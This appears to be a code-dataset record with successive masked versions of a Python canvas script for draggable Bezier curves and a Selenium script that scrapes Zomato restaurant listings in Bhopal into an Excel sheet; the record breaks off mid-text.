"step-2": "<mask token>\n\n\ndef dragC1(mousePos):\n global cx1, cy1\n cx1 = mousePos.x\n cy1 = mousePos.y\n drawCurve()\n\n\ndef dragC2(mousePos):\n global cx2, cy2\n cx2 = mousePos.x\n cy2 = mousePos.y\n drawCurve()\n\n\ndef dragC3(mousePos):\n global cx3, cy3\n cx3 = mousePos.x\n cy3 = mousePos.y\n drawCurve()\n\n\ndef drawCurve():\n qbezdata = ['M', x1, y1, 'Q', cx1, cy1, x2, y2]\n qbez = cgo.compilePath(qbezdata, 'blue')\n cbezdata = ['M', x2, y2, 'C', cx2, cy2, cx3, cy3, x3, y3]\n cbez = cgo.compilePath(cbezdata, 'green')\n data = ['M', x1, y1, 'L', cx1, cy1, x2, y2]\n L1 = cgo.compilePath(data, 'rgba(0, 0, 0, 0.2)')\n data = ['M', x2, y2, 'L', cx2, cy2]\n L2 = cgo.compilePath(data, 'rgba(0, 0, 0, 0.2)')\n data = ['M', x3, y3, 'L', cx3, cy3]\n L3 = cgo.compilePath(data, 'rgba(0, 0, 0, 0.2)')\n c1.transform.reset()\n c1.transform.translate(cx1, cy1)\n c2.transform.reset()\n c2.transform.translate(cx2, cy2)\n c3.transform.reset()\n c3.transform.translate(cx3, cy3)\n grp = cgo.createGroup2D(qbez, cbez, L1, L2, L3, c1, c2, c3)\n cgo.renderFrame(grp)\n\n\ncgo.clearCanvas('lightyellow')\ncgo.setWorldCoords(0, 0, 200)\n<mask token>\nc1.enableDrag(dragObj1)\n<mask token>\nc2.enableDrag(dragObj2)\n<mask token>\nc3.enableDrag(dragObj3)\ndrawCurve()\n",
"step-3": "<mask token>\ncango = JSConstructor(Cango2D)\nshapes2d = JSObject(shapes2D)\ntweener = JSConstructor(Tweener)\ndrag2d = JSConstructor(Drag2D)\nsvgtocgo2d = JSConstructor(svgToCgo2D)\ncgo = cango('plotarea')\nx1, y1 = 40, 20\ncx1, cy1 = 90, 120\nx2, y2 = 120, 100\ncx2, cy2 = 130, 20\ncx3, cy3 = 150, 120\nx3, y3 = 180, 60\n\n\ndef dragC1(mousePos):\n global cx1, cy1\n cx1 = mousePos.x\n cy1 = mousePos.y\n drawCurve()\n\n\ndef dragC2(mousePos):\n global cx2, cy2\n cx2 = mousePos.x\n cy2 = mousePos.y\n drawCurve()\n\n\ndef dragC3(mousePos):\n global cx3, cy3\n cx3 = mousePos.x\n cy3 = mousePos.y\n drawCurve()\n\n\ndef drawCurve():\n qbezdata = ['M', x1, y1, 'Q', cx1, cy1, x2, y2]\n qbez = cgo.compilePath(qbezdata, 'blue')\n cbezdata = ['M', x2, y2, 'C', cx2, cy2, cx3, cy3, x3, y3]\n cbez = cgo.compilePath(cbezdata, 'green')\n data = ['M', x1, y1, 'L', cx1, cy1, x2, y2]\n L1 = cgo.compilePath(data, 'rgba(0, 0, 0, 0.2)')\n data = ['M', x2, y2, 'L', cx2, cy2]\n L2 = cgo.compilePath(data, 'rgba(0, 0, 0, 0.2)')\n data = ['M', x3, y3, 'L', cx3, cy3]\n L3 = cgo.compilePath(data, 'rgba(0, 0, 0, 0.2)')\n c1.transform.reset()\n c1.transform.translate(cx1, cy1)\n c2.transform.reset()\n c2.transform.translate(cx2, cy2)\n c3.transform.reset()\n c3.transform.translate(cx3, cy3)\n grp = cgo.createGroup2D(qbez, cbez, L1, L2, L3, c1, c2, c3)\n cgo.renderFrame(grp)\n\n\ncgo.clearCanvas('lightyellow')\ncgo.setWorldCoords(0, 0, 200)\ndragObj1 = drag2d(cgo, null, dragC1, null)\nc1 = cgo.compileShape(shapes2d.circle, 'red', 'red', 4)\nc1.enableDrag(dragObj1)\ndragObj2 = drag2d(cgo, null, dragC2, null)\nc2 = cgo.compileShape(shapes2d.circle, 'red', 'red', 4)\nc2.enableDrag(dragObj2)\ndragObj3 = drag2d(cgo, null, dragC3, null)\nc3 = cgo.compileShape(shapes2d.circle, 'red', 'red', 4)\nc3.enableDrag(dragObj3)\ndrawCurve()\n",
"step-4": "from javascript import JSConstructor\nfrom javascript import JSObject\ncango = JSConstructor(Cango2D)\nshapes2d = JSObject(shapes2D)\ntweener = JSConstructor(Tweener)\ndrag2d = JSConstructor(Drag2D)\nsvgtocgo2d = JSConstructor(svgToCgo2D)\ncgo = cango('plotarea')\nx1, y1 = 40, 20\ncx1, cy1 = 90, 120\nx2, y2 = 120, 100\ncx2, cy2 = 130, 20\ncx3, cy3 = 150, 120\nx3, y3 = 180, 60\n\n\ndef dragC1(mousePos):\n global cx1, cy1\n cx1 = mousePos.x\n cy1 = mousePos.y\n drawCurve()\n\n\ndef dragC2(mousePos):\n global cx2, cy2\n cx2 = mousePos.x\n cy2 = mousePos.y\n drawCurve()\n\n\ndef dragC3(mousePos):\n global cx3, cy3\n cx3 = mousePos.x\n cy3 = mousePos.y\n drawCurve()\n\n\ndef drawCurve():\n qbezdata = ['M', x1, y1, 'Q', cx1, cy1, x2, y2]\n qbez = cgo.compilePath(qbezdata, 'blue')\n cbezdata = ['M', x2, y2, 'C', cx2, cy2, cx3, cy3, x3, y3]\n cbez = cgo.compilePath(cbezdata, 'green')\n data = ['M', x1, y1, 'L', cx1, cy1, x2, y2]\n L1 = cgo.compilePath(data, 'rgba(0, 0, 0, 0.2)')\n data = ['M', x2, y2, 'L', cx2, cy2]\n L2 = cgo.compilePath(data, 'rgba(0, 0, 0, 0.2)')\n data = ['M', x3, y3, 'L', cx3, cy3]\n L3 = cgo.compilePath(data, 'rgba(0, 0, 0, 0.2)')\n c1.transform.reset()\n c1.transform.translate(cx1, cy1)\n c2.transform.reset()\n c2.transform.translate(cx2, cy2)\n c3.transform.reset()\n c3.transform.translate(cx3, cy3)\n grp = cgo.createGroup2D(qbez, cbez, L1, L2, L3, c1, c2, c3)\n cgo.renderFrame(grp)\n\n\ncgo.clearCanvas('lightyellow')\ncgo.setWorldCoords(0, 0, 200)\ndragObj1 = drag2d(cgo, null, dragC1, null)\nc1 = cgo.compileShape(shapes2d.circle, 'red', 'red', 4)\nc1.enableDrag(dragObj1)\ndragObj2 = drag2d(cgo, null, dragC2, null)\nc2 = cgo.compileShape(shapes2d.circle, 'red', 'red', 4)\nc2.enableDrag(dragObj2)\ndragObj3 = drag2d(cgo, null, dragC3, null)\nc3 = cgo.compileShape(shapes2d.circle, 'red', 'red', 4)\nc3.enableDrag(dragObj3)\ndrawCurve()\n",
"step-5": "from javascript import JSConstructor\nfrom javascript import JSObject\n \ncango = JSConstructor(Cango2D)\nshapes2d = JSObject(shapes2D)\ntweener = JSConstructor(Tweener)\ndrag2d = JSConstructor(Drag2D)\nsvgtocgo2d = JSConstructor(svgToCgo2D)\ncgo = cango(\"plotarea\")\nx1, y1 = 40, 20\ncx1, cy1 = 90, 120\nx2, y2 = 120, 100\ncx2, cy2 = 130, 20\ncx3, cy3 = 150, 120\nx3, y3 = 180, 60\n\n#called in scope of dragNdrop obj\ndef dragC1(mousePos):\n global cx1, cy1\n cx1 = mousePos.x\n cy1 = mousePos.y\n drawCurve()\n\ndef dragC2(mousePos):\n global cx2, cy2\n cx2 = mousePos.x\n cy2 = mousePos.y\n drawCurve()\n\ndef dragC3(mousePos):\n global cx3, cy3\n cx3 = mousePos.x\n cy3 = mousePos.y\n drawCurve()\n\ndef drawCurve():\n # curve change shape so it must be re-compiled each time\n # draw a quadratic bezier from x1,y2 to x2,y2\n qbezdata = ['M', x1, y1, 'Q', cx1, cy1, x2, y2]\n qbez = cgo.compilePath(qbezdata, 'blue')\n cbezdata = ['M', x2, y2, 'C', cx2, cy2, cx3, cy3, x3, y3]\n cbez = cgo.compilePath(cbezdata, 'green')\n # show lines to control point\n data = ['M', x1, y1, 'L', cx1, cy1, x2, y2]\n # semi-transparent gray\n L1 = cgo.compilePath(data, \"rgba(0, 0, 0, 0.2)\")\n data = ['M', x2, y2, 'L', cx2, cy2]\n L2 = cgo.compilePath(data, \"rgba(0, 0, 0, 0.2)\")\n data = ['M', x3, y3, 'L', cx3, cy3]\n L3 = cgo.compilePath(data, \"rgba(0, 0, 0, 0.2)\")\n # draw draggable control points\n c1.transform.reset()\n c1.transform.translate(cx1, cy1)\n c2.transform.reset()\n c2.transform.translate(cx2, cy2)\n c3.transform.reset()\n c3.transform.translate(cx3, cy3)\n grp = cgo.createGroup2D(qbez, cbez, L1, L2, L3, c1, c2, c3)\n cgo.renderFrame(grp)\n\ncgo.clearCanvas(\"lightyellow\")\ncgo.setWorldCoords(0, 0, 200)\n\n# pre-compile the draggable control point\ndragObj1 = drag2d(cgo, null, dragC1, null)\nc1 = cgo.compileShape(shapes2d.circle, 'red', 'red', 4)\nc1.enableDrag(dragObj1)\ndragObj2 = drag2d(cgo, null, dragC2, null)\nc2 = cgo.compileShape(shapes2d.circle, 'red', 'red', 4)\nc2.enableDrag(dragObj2)\ndragObj3 = drag2d(cgo, null, dragC3, null)\nc3 = cgo.compileShape(shapes2d.circle, 'red', 'red', 4)\nc3.enableDrag(dragObj3)\n\ndrawCurve()",
"step-ids": [
3,
5,
6,
7,
8
]
}
|
[
3,
5,
6,
7,
8
] |
<|reserved_special_token_0|>
def traverse(a, b):
temp = []
for i in range(a, b, 1):
a = str(i)
button = browser.find_element_by_link_text(a)
button.click()
name_list = browser.find_elements_by_class_name(
'result-title.hover_feedback.zred.bold.ln24.fontsize0')
add_list = browser.find_elements_by_class_name(
'col-m-16.search-result-address.grey-text.nowrap.ln22')
phone_list = browser.find_elements_by_class_name(
'item.res-snippet-ph-info')
for i in range(1, 18):
if i == 4 or i == 10:
continue
else:
try:
z_costoftwo.append(browser.find_element_by_xpath(
'/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[1]/div[3]/div['
+ str(i) +
']/div[1]/div/article/div[3]/div[2]/span[2]').text)
except Exception as e:
z_costoftwo.append('NILL')
try:
z_hours.append(browser.find_element_by_xpath(
'/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[1]/div[3]/div['
+ str(i) +
']/div[1]/div/article/div[3]/div[3]/div[1]').text)
except Exception as e1:
z_hours.append('NILL')
try:
z_votes.append(browser.find_element_by_xpath(
'/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[1]/div[3]/div['
+ str(i) +
']/div[1]/div/article/div[1]/div/div[2]/div[1]/div[2]/span'
).text)
except Exception as e1:
z_votes.append('NEW')
try:
z_rating_list.append(browser.find_element_by_xpath(
'/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[1]/div[3]/div['
+ str(i) +
']/div[1]/div/article/div[1]/div/div[2]/div[1]/div[2]/div[1]'
).text)
except Exception as e:
z_rating_list.append('NILL')
for names in name_list:
z_hotel_list.append(names.text)
temp.append(names.text)
for addname in add_list:
z_address_list.append(addname.text)
for phonename in phone_list:
z_phone_list.append(phonename.get_attribute('data-phone-no-str'))
if int(a) < 6:
clk = browser.find_element_by_xpath(
'/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[2]/div[1]/div[2]/div/div/a[7]'
)
clk.click()
else:
clk = browser.find_element_by_xpath(
'/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[2]/div[1]/div[2]/div/div/a[8]'
)
clk.click()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
browser.get('https://www.zomato.com/bhopal/dinner')
<|reserved_special_token_0|>
def traverse(a, b):
temp = []
for i in range(a, b, 1):
a = str(i)
button = browser.find_element_by_link_text(a)
button.click()
name_list = browser.find_elements_by_class_name(
'result-title.hover_feedback.zred.bold.ln24.fontsize0')
add_list = browser.find_elements_by_class_name(
'col-m-16.search-result-address.grey-text.nowrap.ln22')
phone_list = browser.find_elements_by_class_name(
'item.res-snippet-ph-info')
for i in range(1, 18):
if i == 4 or i == 10:
continue
else:
try:
z_costoftwo.append(browser.find_element_by_xpath(
'/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[1]/div[3]/div['
+ str(i) +
']/div[1]/div/article/div[3]/div[2]/span[2]').text)
except Exception as e:
z_costoftwo.append('NILL')
try:
z_hours.append(browser.find_element_by_xpath(
'/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[1]/div[3]/div['
+ str(i) +
']/div[1]/div/article/div[3]/div[3]/div[1]').text)
except Exception as e1:
z_hours.append('NILL')
try:
z_votes.append(browser.find_element_by_xpath(
'/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[1]/div[3]/div['
+ str(i) +
']/div[1]/div/article/div[1]/div/div[2]/div[1]/div[2]/span'
).text)
except Exception as e1:
z_votes.append('NEW')
try:
z_rating_list.append(browser.find_element_by_xpath(
'/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[1]/div[3]/div['
+ str(i) +
']/div[1]/div/article/div[1]/div/div[2]/div[1]/div[2]/div[1]'
).text)
except Exception as e:
z_rating_list.append('NILL')
for names in name_list:
z_hotel_list.append(names.text)
temp.append(names.text)
for addname in add_list:
z_address_list.append(addname.text)
for phonename in phone_list:
z_phone_list.append(phonename.get_attribute('data-phone-no-str'))
if int(a) < 6:
clk = browser.find_element_by_xpath(
'/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[2]/div[1]/div[2]/div/div/a[7]'
)
clk.click()
else:
clk = browser.find_element_by_xpath(
'/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[2]/div[1]/div[2]/div/div/a[8]'
)
clk.click()
traverse(1, 6)
traverse(6, 11)
traverse(11, 16)
traverse(16, 21)
traverse(21, 26)
for i in range(0, len(z_hotel_list), 1):
sheet1.write(i, 0, z_hotel_list[i])
for i in range(0, len(z_phone_list), 1):
sheet1.write(i, 1, z_phone_list[i])
for i in range(0, len(z_address_list), 1):
sheet1.write(i, 2, z_address_list[i])
for i in range(0, len(z_rating_list)):
sheet1.write(i, 3, z_rating_list[i])
for i in range(0, len(z_costoftwo)):
sheet1.write(i, 4, z_costoftwo[i])
for i in range(0, len(z_hours)):
sheet1.write(i, 5, z_hours[i])
for i in range(0, len(z_votes)):
sheet1.write(i, 6, z_votes[i])
print('Writing to excel Finished')
book.save('ZomatoBhopal(data).xls')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
book = xlwt.Workbook(encoding='utf-8')
sheet1 = book.add_sheet('Sheet 1')
browser = webdriver.Firefox()
browser.get('https://www.zomato.com/bhopal/dinner')
z_hotel_list = []
z_address_list = []
z_phone_list = []
z_rating_list = []
z_costoftwo = []
z_votes = []
z_hours = []
def traverse(a, b):
temp = []
for i in range(a, b, 1):
a = str(i)
button = browser.find_element_by_link_text(a)
button.click()
name_list = browser.find_elements_by_class_name(
'result-title.hover_feedback.zred.bold.ln24.fontsize0')
add_list = browser.find_elements_by_class_name(
'col-m-16.search-result-address.grey-text.nowrap.ln22')
phone_list = browser.find_elements_by_class_name(
'item.res-snippet-ph-info')
for i in range(1, 18):
if i == 4 or i == 10:
continue
else:
try:
z_costoftwo.append(browser.find_element_by_xpath(
'/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[1]/div[3]/div['
+ str(i) +
']/div[1]/div/article/div[3]/div[2]/span[2]').text)
except Exception as e:
z_costoftwo.append('NILL')
try:
z_hours.append(browser.find_element_by_xpath(
'/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[1]/div[3]/div['
+ str(i) +
']/div[1]/div/article/div[3]/div[3]/div[1]').text)
except Exception as e1:
z_hours.append('NILL')
try:
z_votes.append(browser.find_element_by_xpath(
'/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[1]/div[3]/div['
+ str(i) +
']/div[1]/div/article/div[1]/div/div[2]/div[1]/div[2]/span'
).text)
except Exception as e1:
z_votes.append('NEW')
try:
z_rating_list.append(browser.find_element_by_xpath(
'/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[1]/div[3]/div['
+ str(i) +
']/div[1]/div/article/div[1]/div/div[2]/div[1]/div[2]/div[1]'
).text)
except Exception as e:
z_rating_list.append('NILL')
for names in name_list:
z_hotel_list.append(names.text)
temp.append(names.text)
for addname in add_list:
z_address_list.append(addname.text)
for phonename in phone_list:
z_phone_list.append(phonename.get_attribute('data-phone-no-str'))
if int(a) < 6:
clk = browser.find_element_by_xpath(
'/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[2]/div[1]/div[2]/div/div/a[7]'
)
clk.click()
else:
clk = browser.find_element_by_xpath(
'/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[2]/div[1]/div[2]/div/div/a[8]'
)
clk.click()
traverse(1, 6)
traverse(6, 11)
traverse(11, 16)
traverse(16, 21)
traverse(21, 26)
for i in range(0, len(z_hotel_list), 1):
sheet1.write(i, 0, z_hotel_list[i])
for i in range(0, len(z_phone_list), 1):
sheet1.write(i, 1, z_phone_list[i])
for i in range(0, len(z_address_list), 1):
sheet1.write(i, 2, z_address_list[i])
for i in range(0, len(z_rating_list)):
sheet1.write(i, 3, z_rating_list[i])
for i in range(0, len(z_costoftwo)):
sheet1.write(i, 4, z_costoftwo[i])
for i in range(0, len(z_hours)):
sheet1.write(i, 5, z_hours[i])
for i in range(0, len(z_votes)):
sheet1.write(i, 6, z_votes[i])
print('Writing to excel Finished')
book.save('ZomatoBhopal(data).xls')
<|reserved_special_token_1|>
from selenium import webdriver
import time
import xlwt
from JD_PhoneNo import get_phone_no
book = xlwt.Workbook(encoding='utf-8')
sheet1 = book.add_sheet('Sheet 1')
browser = webdriver.Firefox()
browser.get('https://www.zomato.com/bhopal/dinner')
z_hotel_list = []
z_address_list = []
z_phone_list = []
z_rating_list = []
z_costoftwo = []
z_votes = []
z_hours = []
def traverse(a, b):
temp = []
for i in range(a, b, 1):
a = str(i)
button = browser.find_element_by_link_text(a)
button.click()
name_list = browser.find_elements_by_class_name(
'result-title.hover_feedback.zred.bold.ln24.fontsize0')
add_list = browser.find_elements_by_class_name(
'col-m-16.search-result-address.grey-text.nowrap.ln22')
phone_list = browser.find_elements_by_class_name(
'item.res-snippet-ph-info')
for i in range(1, 18):
if i == 4 or i == 10:
continue
else:
try:
z_costoftwo.append(browser.find_element_by_xpath(
'/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[1]/div[3]/div['
+ str(i) +
']/div[1]/div/article/div[3]/div[2]/span[2]').text)
except Exception as e:
z_costoftwo.append('NILL')
try:
z_hours.append(browser.find_element_by_xpath(
'/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[1]/div[3]/div['
+ str(i) +
']/div[1]/div/article/div[3]/div[3]/div[1]').text)
except Exception as e1:
z_hours.append('NILL')
try:
z_votes.append(browser.find_element_by_xpath(
'/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[1]/div[3]/div['
+ str(i) +
']/div[1]/div/article/div[1]/div/div[2]/div[1]/div[2]/span'
).text)
except Exception as e1:
z_votes.append('NEW')
try:
z_rating_list.append(browser.find_element_by_xpath(
'/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[1]/div[3]/div['
+ str(i) +
']/div[1]/div/article/div[1]/div/div[2]/div[1]/div[2]/div[1]'
).text)
except Exception as e:
z_rating_list.append('NILL')
for names in name_list:
z_hotel_list.append(names.text)
temp.append(names.text)
for addname in add_list:
z_address_list.append(addname.text)
for phonename in phone_list:
z_phone_list.append(phonename.get_attribute('data-phone-no-str'))
if int(a) < 6:
clk = browser.find_element_by_xpath(
'/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[2]/div[1]/div[2]/div/div/a[7]'
)
clk.click()
else:
clk = browser.find_element_by_xpath(
'/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[2]/div[1]/div[2]/div/div/a[8]'
)
clk.click()
traverse(1, 6)
traverse(6, 11)
traverse(11, 16)
traverse(16, 21)
traverse(21, 26)
for i in range(0, len(z_hotel_list), 1):
sheet1.write(i, 0, z_hotel_list[i])
for i in range(0, len(z_phone_list), 1):
sheet1.write(i, 1, z_phone_list[i])
for i in range(0, len(z_address_list), 1):
sheet1.write(i, 2, z_address_list[i])
for i in range(0, len(z_rating_list)):
sheet1.write(i, 3, z_rating_list[i])
for i in range(0, len(z_costoftwo)):
sheet1.write(i, 4, z_costoftwo[i])
for i in range(0, len(z_hours)):
sheet1.write(i, 5, z_hours[i])
for i in range(0, len(z_votes)):
sheet1.write(i, 6, z_votes[i])
print('Writing to excel Finished')
book.save('ZomatoBhopal(data).xls')
<|reserved_special_token_1|>
from selenium import webdriver
import time
import xlwt
from JD_PhoneNo import get_phone_no
book = xlwt.Workbook(encoding="utf-8")
sheet1=book.add_sheet("Sheet 1")
browser = webdriver.Firefox()
browser.get("https://www.zomato.com/bhopal/dinner")
z_hotel_list = []
z_address_list = []
z_phone_list = []
z_rating_list = []
z_costoftwo = []
z_votes = []
z_hours = []
def traverse(a,b):
temp = []
for i in range(a,b,1):
a = str(i)
button = browser.find_element_by_link_text(a)
button.click()
name_list = browser.find_elements_by_class_name("result-title.hover_feedback.zred.bold.ln24.fontsize0")
add_list = browser.find_elements_by_class_name("col-m-16.search-result-address.grey-text.nowrap.ln22")
phone_list = browser.find_elements_by_class_name("item.res-snippet-ph-info")
for i in range(1,18):
if(i==4 or i==10 ):
continue
else:
try:
z_costoftwo.append(browser.find_element_by_xpath("/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[1]/div[3]/div["+str(i)+"]/div[1]/div/article/div[3]/div[2]/span[2]").text)
except Exception as e:
z_costoftwo.append("NILL")
try:
z_hours.append(browser.find_element_by_xpath("/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[1]/div[3]/div["+str(i)+"]/div[1]/div/article/div[3]/div[3]/div[1]").text)
except Exception as e1:
z_hours.append("NILL")
try:
z_votes.append(browser.find_element_by_xpath("/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[1]/div[3]/div["+str(i)+"]/div[1]/div/article/div[1]/div/div[2]/div[1]/div[2]/span").text)
except Exception as e1:
z_votes.append("NEW")
try:
z_rating_list.append(browser.find_element_by_xpath("/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[1]/div[3]/div["+str(i)+"]/div[1]/div/article/div[1]/div/div[2]/div[1]/div[2]/div[1]").text)
except Exception as e:
z_rating_list.append("NILL")
for names in name_list:
z_hotel_list.append(names.text)
temp.append(names.text)
for addname in add_list:
z_address_list.append(addname.text)
for phonename in phone_list:
z_phone_list.append(phonename.get_attribute("data-phone-no-str"))
if(int(a)<6):
clk = browser.find_element_by_xpath("/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[2]/div[1]/div[2]/div/div/a[7]")
clk.click()
else:
clk = browser.find_element_by_xpath("/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[2]/div[1]/div[2]/div/div/a[8]")
clk.click()
traverse(1,6)
traverse(6,11)
traverse(11,16)
traverse(16,21)
traverse(21,26)
# traverse(26,31)
# traverse(31,36)
# traverse(36,41)
# traverse(41,46)
# traverse(46,51)
# traverse(51,56)
# for i in range(1,5,10):
# traverse(i,i+5)
# traverse(i+5,i+10)
for i in range(0,len(z_hotel_list),1):
sheet1.write(i,0,z_hotel_list[i])
for i in range(0, len(z_phone_list), 1):
sheet1.write(i,1,z_phone_list[i])
for i in range(0, len(z_address_list), 1):
sheet1.write(i, 2, z_address_list[i])
for i in range(0,len(z_rating_list)):
sheet1.write(i,3,z_rating_list[i])
for i in range(0, len(z_costoftwo)):
sheet1.write(i, 4, z_costoftwo[i])
for i in range(0, len(z_hours)):
sheet1.write(i, 5, z_hours[i])
for i in range(0, len(z_votes)):
sheet1.write(i, 6, z_votes[i])
print("Writing to excel Finished")
book.save("ZomatoBhopal(data).xls")
|
flexible
|
{
"blob_id": "96425986305171a9d23231f60b35dcbcbbd12d2d",
"index": 7995,
"step-1": "<mask token>\n\n\ndef traverse(a, b):\n temp = []\n for i in range(a, b, 1):\n a = str(i)\n button = browser.find_element_by_link_text(a)\n button.click()\n name_list = browser.find_elements_by_class_name(\n 'result-title.hover_feedback.zred.bold.ln24.fontsize0')\n add_list = browser.find_elements_by_class_name(\n 'col-m-16.search-result-address.grey-text.nowrap.ln22')\n phone_list = browser.find_elements_by_class_name(\n 'item.res-snippet-ph-info')\n for i in range(1, 18):\n if i == 4 or i == 10:\n continue\n else:\n try:\n z_costoftwo.append(browser.find_element_by_xpath(\n '/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[1]/div[3]/div['\n + str(i) +\n ']/div[1]/div/article/div[3]/div[2]/span[2]').text)\n except Exception as e:\n z_costoftwo.append('NILL')\n try:\n z_hours.append(browser.find_element_by_xpath(\n '/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[1]/div[3]/div['\n + str(i) +\n ']/div[1]/div/article/div[3]/div[3]/div[1]').text)\n except Exception as e1:\n z_hours.append('NILL')\n try:\n z_votes.append(browser.find_element_by_xpath(\n '/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[1]/div[3]/div['\n + str(i) +\n ']/div[1]/div/article/div[1]/div/div[2]/div[1]/div[2]/span'\n ).text)\n except Exception as e1:\n z_votes.append('NEW')\n try:\n z_rating_list.append(browser.find_element_by_xpath(\n '/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[1]/div[3]/div['\n + str(i) +\n ']/div[1]/div/article/div[1]/div/div[2]/div[1]/div[2]/div[1]'\n ).text)\n except Exception as e:\n z_rating_list.append('NILL')\n for names in name_list:\n z_hotel_list.append(names.text)\n temp.append(names.text)\n for addname in add_list:\n z_address_list.append(addname.text)\n for phonename in phone_list:\n z_phone_list.append(phonename.get_attribute('data-phone-no-str'))\n if int(a) < 6:\n clk = browser.find_element_by_xpath(\n '/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[2]/div[1]/div[2]/div/div/a[7]'\n )\n clk.click()\n else:\n clk = browser.find_element_by_xpath(\n '/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[2]/div[1]/div[2]/div/div/a[8]'\n )\n clk.click()\n\n\n<mask token>\n",
"step-2": "<mask token>\nbrowser.get('https://www.zomato.com/bhopal/dinner')\n<mask token>\n\n\ndef traverse(a, b):\n temp = []\n for i in range(a, b, 1):\n a = str(i)\n button = browser.find_element_by_link_text(a)\n button.click()\n name_list = browser.find_elements_by_class_name(\n 'result-title.hover_feedback.zred.bold.ln24.fontsize0')\n add_list = browser.find_elements_by_class_name(\n 'col-m-16.search-result-address.grey-text.nowrap.ln22')\n phone_list = browser.find_elements_by_class_name(\n 'item.res-snippet-ph-info')\n for i in range(1, 18):\n if i == 4 or i == 10:\n continue\n else:\n try:\n z_costoftwo.append(browser.find_element_by_xpath(\n '/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[1]/div[3]/div['\n + str(i) +\n ']/div[1]/div/article/div[3]/div[2]/span[2]').text)\n except Exception as e:\n z_costoftwo.append('NILL')\n try:\n z_hours.append(browser.find_element_by_xpath(\n '/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[1]/div[3]/div['\n + str(i) +\n ']/div[1]/div/article/div[3]/div[3]/div[1]').text)\n except Exception as e1:\n z_hours.append('NILL')\n try:\n z_votes.append(browser.find_element_by_xpath(\n '/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[1]/div[3]/div['\n + str(i) +\n ']/div[1]/div/article/div[1]/div/div[2]/div[1]/div[2]/span'\n ).text)\n except Exception as e1:\n z_votes.append('NEW')\n try:\n z_rating_list.append(browser.find_element_by_xpath(\n '/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[1]/div[3]/div['\n + str(i) +\n ']/div[1]/div/article/div[1]/div/div[2]/div[1]/div[2]/div[1]'\n ).text)\n except Exception as e:\n z_rating_list.append('NILL')\n for names in name_list:\n z_hotel_list.append(names.text)\n temp.append(names.text)\n for addname in add_list:\n z_address_list.append(addname.text)\n for phonename in phone_list:\n z_phone_list.append(phonename.get_attribute('data-phone-no-str'))\n if int(a) < 6:\n clk = browser.find_element_by_xpath(\n '/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[2]/div[1]/div[2]/div/div/a[7]'\n )\n clk.click()\n else:\n clk = browser.find_element_by_xpath(\n '/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[2]/div[1]/div[2]/div/div/a[8]'\n )\n clk.click()\n\n\ntraverse(1, 6)\ntraverse(6, 11)\ntraverse(11, 16)\ntraverse(16, 21)\ntraverse(21, 26)\nfor i in range(0, len(z_hotel_list), 1):\n sheet1.write(i, 0, z_hotel_list[i])\nfor i in range(0, len(z_phone_list), 1):\n sheet1.write(i, 1, z_phone_list[i])\nfor i in range(0, len(z_address_list), 1):\n sheet1.write(i, 2, z_address_list[i])\nfor i in range(0, len(z_rating_list)):\n sheet1.write(i, 3, z_rating_list[i])\nfor i in range(0, len(z_costoftwo)):\n sheet1.write(i, 4, z_costoftwo[i])\nfor i in range(0, len(z_hours)):\n sheet1.write(i, 5, z_hours[i])\nfor i in range(0, len(z_votes)):\n sheet1.write(i, 6, z_votes[i])\nprint('Writing to excel 